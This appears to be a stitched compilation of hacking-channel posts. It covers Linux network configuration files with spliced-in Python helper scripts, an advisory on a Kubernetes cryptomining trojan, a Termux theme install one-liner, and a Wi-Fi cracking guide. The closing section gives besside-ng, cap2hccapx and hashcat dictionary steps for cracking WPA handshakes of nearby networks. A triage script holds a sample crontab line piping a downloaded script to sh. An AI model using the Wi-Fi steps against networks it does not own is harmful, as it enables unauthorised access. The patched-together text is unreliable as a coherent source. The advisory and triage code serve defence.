UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform that collects and analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Quick interpretation of network configuration files


In the Linux system of iamafan, the TCP/IP network is configured through several text files, which must be edited to complete the networking setup. The important network configuration files in the system are:

◆ /etc/sysconfig/network
◆ /etc/HOSTNAME
◆ /etc/hosts
◆ /etc/services
◆ /etc/host.conf
◆ /etc/nsswitch.conf
◆ /etc/resolv.conf
◆ /etc/rc.d/init.d/network

We will go through these files one by one. They can be modified while the system is running, without starting or stopping any daemons, and the changes take effect immediately (except for /etc/sysconfig/network). All of these files support comments starting with "#". Each file has an entry in section 5 of the UNIX man pages, which you can read with the man command.

◆ /etc/sysconfig/network network settings
This file specifies network configuration information on the server and contains parameters that control the behavior of network-related files and daemons. The following is an example file:

NETWORKING=yes
HOSTNAME=machine1
GATEWAY=210.34.6.2
FORWARD_IPV4=yes
GATEWAYDEV=

where:
NETWORKING=yes/no indicates whether the network is configured;
HOSTNAME=hostname, where hostname is the host name of the server;
GATEWAY=gw-ip, where gw-ip is the IP address of the network gateway;
FORWARD_IPV4=yes/no indicates whether to enable the IP forwarding function;
GATEWAYDEV=gw-dev, where gw-dev is the device name of the gateway, such as eth0.

To stay compatible with some old software, the "/etc/HOSTNAME" file should use the same host name as HOSTNAME=hostname.

◆ /etc/HOSTNAME host name

This file contains the host name of the system, including the complete domain name, such as:

192.168.0.1 machine1.domain machine1

This file is obtained at startup from the HOSTNAME line in the file /etc/sysconfig/network and is used to set the host name of the system at startup.

◆ /etc/hosts IP address and host name mapping

/etc/hosts contains the mapping between IP addresses and host names, including host name aliases. IP addresses are designed to be easy for computers to identify, but they are hard for people to remember. The file /etc/hosts was created to solve this problem. Here is an example file:

127.0.0.1 machine1 localhost.localdomain localhost
192.168.1.100 machine7
192.168.1.101 otherpc otheralias

In this example, the machine name is machine1, and otherpc also has the alias otheralias, so it can be referred to by either name. Once the machine's network configuration files are configured, the network should be restarted for the changes to take effect. Use the following command to restart the network:

/etc/rc.d/init.d/network restart

The /etc/hosts file usually contains the host name, localhost, and the system aliases frequently used by system administrators. Sometimes it takes a long time to telnet to a Linux machine; adding an entry to "/etc/hosts" that maps the client machine's IP address to its host name can reduce the login wait time. In the absence of a domain name server, all network programs on the system resolve the IP address for a host name by querying this file. Otherwise, other host names are usually resolved using DNS, and the DNS client is configured in the file /etc/resolv.conf.

◆ /etc/services

/etc/services contains the mapping between service names and port numbers. Many system programs use this file. The following are the first few lines of the default /etc/services installed by RedHat:

tcpmux 1/tcp # TCP port service multiplexer
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users

The leftmost column is the service name, and the middle column is the port number. The "/" is followed by the port type, which can be TCP or UDP. Any further columns after the port number are aliases of the service. In the above example, sink and null are aliases for the discard service.

◆ /etc/host.conf Configure the name resolver

Two files declare where the system looks for name information and so configure the UNIX name resolver library. The file /etc/host.conf is used by version 5 of the libc library, and /etc/nsswitch.conf is used by version 6 (glibc). The problem is that some programs use one and some use the other, so both files need to be configured correctly.


written by undercode
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

The /etc/host.conf file specifies how host names are resolved. Linux uses the resolver library to obtain the IP address corresponding to a host name. The following is the default content of "/etc/host.conf" after a RedHat installation:

order hosts, bind
multi on

※ "order" specifies the host name lookup order. Its parameters are lookup methods separated by commas. The supported methods are bind, hosts, and nis, which stand for DNS, /etc/hosts, and NIS, respectively. Here, the "/etc/hosts" file is queried first, and then DNS is used to resolve the name.
※ "trim" indicates that when an address is converted to a host name through DNS, the domain name is trimmed from the host name. trim can be given multiple times for multiple domains. It has no effect on the /etc/hosts and NIS lookup methods, so make sure the host names in the /etc/hosts and NIS tables are listed appropriately (with or without the full domain name).
※ "multi" specifies whether a host listed in the "/etc/hosts" file can have multiple addresses. A value of on means it is allowed. Hosts with multiple IP addresses are generally hosts with multiple network interfaces.
※ "nospoof" specifies whether IP address spoofing against the server is allowed. A value of on means it is not allowed. IP spoofing is a way of attacking the security of a system: by disguising an IP address as that of another computer, an attacker can obtain the trust of other computers.
※ "alert": when nospoof is on, alert controls whether spoofing attempts are recorded through syslog. A value of on enables this, and the default value is off.
※ "reorder": if set to on, all lookup results are reordered so that hosts in the same subnet are returned first. The default value is off.

◆ /etc/nsswitch.conf configuration name resolver

The /etc/nsswitch.conf file was developed by Sun and is used to manage the order in which multiple configuration sources in the system are consulted. It provides more functionality than the /etc/host.conf file. Each line in /etc/nsswitch.conf is either a comment (beginning with a # sign) or a keyword followed by a colon and a series of methods to be tried in order. Each keyword is the name of a file in the /etc/ directory that can be controlled by /etc/nsswitch.conf.

The following keywords can be included:
※ aliases: mail aliases;
※ passwd: system users;
※ group: user groups;
※ shadow: hidden passwords;
※ hosts: host names and IP addresses;
※ networks: network names and numbers;
※ protocols: network protocols;
※ services: port numbers and service names;
※ ethers: Ethernet numbers;
※ rpc: remote procedure call names and numbers;
※ netgroup: intranet groups.

The following methods can follow a keyword:
※ files is valid for all keywords except netgroup. Records are looked up in the corresponding /etc file.
※ db is valid for all keywords except netgroup. Records are looked up in the corresponding /var/db database. This is very effective for long files, such as a passwd file with more than 500 entries. To generate these files from the standard /etc files, change the directory to /var/db and run the run command.
※ compat is compatibility mode, which is valid for the passwd, group, and shadow files. In this mode, the corresponding /etc file is searched first. If you want an NIS lookup to be performed, the first field (user name or group name) must be a plus sign (+), followed by the corresponding number of colons (:) (6 for /etc/passwd, 3 for /etc/group, and 8 for /etc/shadow). For example, the /etc/passwd file should end with the following line: +:*:::::
※ dns is only meaningful for hosts. Lookups are made in DNS, as configured in /etc/resolv.conf.
※ nis is meaningful for all keywords. If NIS is available, lookups are made on the NIS server.
※ [STATUS=action] controls the behavior of the name service. STATUS is one of SUCCESS (operation successfully executed), NOTFOUND (record not found), UNAVAIL (selected service is unavailable), and TRYAGAIN (service is temporarily unavailable, please try again). action is one of return (terminate the search and return the current status) or continue (continue with the other items on this line). For example, hosts: dns nis [NOTFOUND=return] files looks the host name up in DNS first and then in NIS. The file /etc/hosts is used only when the first two are unavailable.
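
The lookup order decides which source gets to answer for a name, so it is worth checking what a given line really does. The following is an added example, not part of the original post: a small parser for the keyword/method/[STATUS=action] syntax described above that reports which methods are consulted for a given set of outcomes. The function names and the sample file are constructed for illustration.

```python
import re

STATUSES = ("SUCCESS", "NOTFOUND", "UNAVAIL", "TRYAGAIN")
# Behaviour when a line gives no [STATUS=action]: stop on SUCCESS, otherwise go on.
DEFAULT_ACTIONS = {s: ("return" if s == "SUCCESS" else "continue") for s in STATUSES}

def parse_nsswitch(text):
    """Map each keyword to its ordered chain of (method, {STATUS: action})."""
    chains = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if ":" not in line:
            continue
        keyword, rest = line.split(":", 1)
        chain = []
        # A token is either a method name or a bracketed [STATUS=action] group.
        for token in re.findall(r"\[[^\]]*\]|[^\s\[\]]+", rest):
            if not token.startswith("["):
                chain.append((token, dict(DEFAULT_ACTIONS)))
                continue
            if not chain:
                raise ValueError(f"{keyword}: [STATUS=action] before any method")
            # This parser tolerates spaces around "=" inside the brackets.
            for item in re.sub(r"\s*=\s*", "=", token[1:-1]).split():
                status, _, action = item.partition("=")
                status, action = status.upper(), action.lower()
                if status not in STATUSES or action not in ("return", "continue"):
                    raise ValueError(f"{keyword}: bad criterion {item!r}")
                chain[-1][1][status] = action        # applies to the method before it
        chains[keyword.strip()] = chain
    return chains

def methods_consulted(chain, outcomes):
    """Given each method's STATUS for one lookup, list the methods actually tried."""
    tried = []
    for method, actions in chain:
        tried.append(method)
        if actions[outcomes.get(method, "UNAVAIL")] == "return":
            break
    return tried

# Constructed sample; the hosts line is the one quoted in the text above.
SAMPLE = """\
# /etc/nsswitch.conf (constructed)
passwd: files
hosts:  dns nis [NOTFOUND=return] files
"""
HOSTS_CHAIN = parse_nsswitch(SAMPLE)["hosts"]
```

With this line, a name that exists only in /etc/hosts is never resolved while NIS is reachable and answers NOTFOUND, because the search stops before files is tried.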

◆ /etc/resolv.conf configures the DNS client

The file /etc/resolv.conf configures the DNS client. It contains the domain name search order of the host and the addresses of the DNS servers. Each line should contain a keyword and one or more parameters separated by spaces. The following is an example file:

search mydom.edu.cn
nameserver 210.34.0.14
nameserver 210.34.0.2

The legal parameters and their meanings are as follows:
※ nameserver gives the IP address of a DNS server. There can be several nameserver lines, each with one IP address. Queries go to the nameservers in the order they appear in this file, and a later nameserver is queried only when the first one does not respond.
※ domain declares the domain name of the host. It is used by many programs, such as mail systems; it is also used when performing DNS queries for hosts without domain names. If there is no domain name, the host name is used, with everything before the first dot (.) removed.
※ search: its parameters give the domain name search order. When you query a host name that has no domain name, the host is searched for in each of the domains declared by search. domain and search cannot coexist; if both are present, the one that appears later is used.
※ sortlist allows specific sorting of the returned results. Its parameters are network/mask pairs, allowing arbitrary ordering.

Red Hat does not provide a default /etc/resolv.conf file; its content is created dynamically based on the options given during installation.
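
Because every DNS answer on the host comes from the servers listed here, an unexpected nameserver line is worth flagging. The following is an added example, not part of the original post: it applies the rules above (nameservers in file order, the later of domain/search wins) and reports nameservers outside an allowlist. The sample extends the file shown above with a constructed domain line and a constructed third nameserver, and the allowed network 210.34.0.0/24 is an assumption.

```python
import ipaddress

def effective_resolv_conf(text):
    """Return (nameservers in query order, effective search list) for resolv.conf text."""
    nameservers, search = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":              # blank line or comment
            continue
        keyword, *args = line.split()
        if not args:
            continue
        if keyword == "nameserver":
            # ip_address() raises ValueError on a malformed address
            nameservers.append(ipaddress.ip_address(args[0]))
        elif keyword == "domain":
            search = [args[0]]                       # replaces an earlier search line
        elif keyword == "search":
            search = args                            # replaces an earlier domain line
    return nameservers, search

def unexpected_nameservers(nameservers, allowed_networks):
    """Nameservers that fall outside every allowed network, as strings."""
    nets = [ipaddress.ip_network(n) for n in allowed_networks]
    return [str(ns) for ns in nameservers if not any(ns in net for net in nets)]

# Constructed sample: the example file above plus a domain line and one extra server.
SAMPLE = """\
# /etc/resolv.conf (constructed)
domain example.test
search mydom.edu.cn
nameserver 210.34.0.14
nameserver 210.34.0.2
nameserver 203.0.113.53
"""

if __name__ == "__main__":
    servers, search = effective_resolv_conf(SAMPLE)
    print("query order:", [str(s) for s in servers])
    print("search list:", search)
    print("not in allowlist:", unexpected_nameservers(servers, ["210.34.0.0/24"]))
```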

◆ /etc/init.d/network host address, subnet mask, and gateway

Unlike many other UNIX and Linux operating systems, Red Hat currently cannot configure the network automatically through the /etc/hostname and /etc/hosts files. To change the default IP address of the host, you must edit the /etc/init.d/network script directly so that it reflects the correct network configuration. This file includes variables that declare the IP address, mask, network, broadcast address, and default router. Here is the corresponding part of this file:

IPADDR=192.168.1.100
NETMASK=255.255.255.0
BROADCAST=192.168.1.255
GATEWAY=192.168.1.1
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Beware of Linux mining Trojans invading through Kubernetes:

> Recently, the Tencent security team received feedback from some users, and some Linux hosts detected a Trojan file named docker.

> After extracting the investigation clues on site, it was found that the mining Trojan was suspected of invading through lower-version Kubernetes components. After the invasion is successful, a malicious sh script is executed on the machine, and the malicious script cleans out similar Trojans. At the same time, the miner is pulled from the address 82.146.53.166 and mines illegally once it is configured. The malicious sh scripts currently seen mainly include the following 2 versions.

🦑 Version 1
This script terminates other mining-related modules on the current machine, downloads the 32-bit or 64-bit ELF miner program to the tmp directory of the host under the name docker and executes it, pulls the miner configuration, and deletes the local miner-related files after the miner has been started.

🦑 Version 2
This script terminates other mining-related modules on the current machine, downloads the 32-bit or 64-bit ELF miner program to the tmp directory of the host under the name php and executes it, pulls the miner configuration, and deletes the local miner files after the miner has been started. This version of the script also adds scheduled tasks and attempts to execute the sh script every minute.

🦑 Safety advice
1. Check for and clean up suspicious miner files named docker and php in the root directory and the tmp directory of the host;

2. Review the crontab task list and delete abnormal scheduled tasks;

3. Check the Kubernetes components on the machine and upgrade them to the latest version;

4. Configure authentication and authorization for external access to the Kubelet, and prohibit anonymous access.
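
Checks 1 and 2 can be scripted for triage. The following is an added example, not part of the original post or of the advisory it quotes: it looks for ELF files named docker or php directly in the given directories and for crontab entries that fire every minute and run a shell script. The sample crontab, the placeholder URL and the temporary directory are constructed, and the regular expressions are a heuristic that will need tuning per host.

```python
import re
import tempfile
from pathlib import Path

SUSPECT_NAMES = {"docker", "php"}   # file names the advisory reports for the miner
ELF_MAGIC = b"\x7fELF"
# "* * * * *" or "*/1 * * * *", followed by the command field
EVERY_MINUTE = re.compile(r"^\s*\*(?:/1)?\s+\*\s+\*\s+\*\s+\*\s+(.+)$")
# the command pipes into a shell or runs a .sh file
RUNS_SHELL = re.compile(r"\|\s*(?:ba)?sh\b|\.sh\b")

def find_suspect_binaries(directories=("/", "/tmp")):
    """Regular files named docker/php, directly in the given directories, that are ELF."""
    hits = []
    for directory in directories:
        for name in sorted(SUSPECT_NAMES):
            path = Path(directory) / name
            if path.is_file() and not path.is_symlink():
                with path.open("rb") as fh:
                    if fh.read(4) == ELF_MAGIC:
                        hits.append(str(path))
    return hits

def find_suspect_cron_lines(crontab_text):
    """Non-comment crontab entries that fire every minute and run a shell script."""
    hits = []
    for line in crontab_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        match = EVERY_MINUTE.match(line)
        if match and RUNS_SHELL.search(match.group(1)):
            hits.append(line.strip())
    return hits

# Constructed crontab listing (what `crontab -l` might print); the URL is a placeholder.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * curl -fsSL http://miner.example.invalid/k.sh | sh
*/1 * * * * /tmp/.x/update.sh >/dev/null 2>&1
* * * * * /usr/bin/flock -n /run/hb.lock /usr/local/bin/heartbeat
"""

def demo():
    with tempfile.TemporaryDirectory() as tmp:   # constructed stand-in for /tmp
        (Path(tmp) / "docker").write_bytes(ELF_MAGIC + b"\x02\x01\x01" + bytes(9))
        (Path(tmp) / "php").write_text("#!/bin/sh\necho not an ELF\n")
        found = [Path(p).name for p in find_suspect_binaries([tmp])]
    return found, find_suspect_cron_lines(SAMPLE_CRONTAB)
```

Calling `demo()` flags the constructed `docker` file and the two every-minute shell entries, while the every-minute heartbeat job that runs no script is left alone.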

written by undercode
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Customize Termux Font & Colors:

ⒾⓃⓈⓉⒶⓁⓁⒶⓉⒾⓄⓃ & ⓇⓊⓃ:

1) apt update
2) apt install git -y
3) git clone https://github.com/htr-tech/tstyle
4) cd tstyle
5) bash setup.sh

> One-command install:

apt update && apt install git -y && git clone https://github.com/htr-tech/tstyle && cd tstyle && bash setup.sh && tstyle

6) then choose options via numbers

🦑 Features:

Latest Fonts & Themes
Full Offline!
Easy to Use!
✅
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Wi-Fi hacking methods in 2020:

What do you need to hack Wi-Fi?


1) You need a sufficient number of wireless networks. If you live on the edge of a village and only one Wi-Fi network is within your reach, then clearly there are not many chances.

The more networks in the area, the better.

2) There are no special hardware requirements, and for some attacks even Wi-Fi adapters that do not support monitor mode are suitable. Nevertheless, I highly recommend adapters with an external antenna, and if the antenna is removable, it is better to buy another larger one. IMHO, half the "skills" of a Wi-Fi cracker are in a large antenna ...
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Fast brute force password:

1) Unfortunately, there are not many access points with WPS enabled. Nevertheless, we will return to them. Now we will consider the classic version of capturing a handshake and breaking a password. Its speed is as follows:

2) Automatic handshake capture for all access points within reach; two types of brute force with Hashcat are launched: by dictionary and by an eight-digit mask. Experience shows that quite a few APs lend themselves to it. This method also has a good ratio of time to result.

3) For example, we put the wireless interface in monitor mode.

4) Run the command to collect handshakes:


sudo besside-ng INTERFACE -W

All handshakes will be saved to the wpa.cap file .


5) If you are going to hack them all, you can convert them all at once to hashcat format using cap2hccapx:

https://kali.tools/?p=658#cap2hccapx

> cap2hccapx wpa.cap output.hccapx

🦑 If you only need the hash of a specific access point, then use the network name (ESSID) as a filter. For example, I'm only interested in the Wi-Fi handshake of the netis56 network and I want to save it to the netis56.hccapx file:

cap2hccapx wpa.cap netis56.hccapx netis56

6) If you want to split the wpa.cap file into separate handshakes, use the script from the article “How to extract handshakes from a capture file with several handshakes”, and then convert them with cap2hccapx as well.

> For a dictionary attack, I use the rockyou dictionary; a cleaned version can be downloaded from this link > https://github.com/Mi-Al/WiFi-autopwner/raw/master/dict/rockyou_cleaned.txt

🦑 Example of a successful dictionary hack (hacking time 9 seconds):
Another example of a successful dictionary hack (hacking time 13 seconds):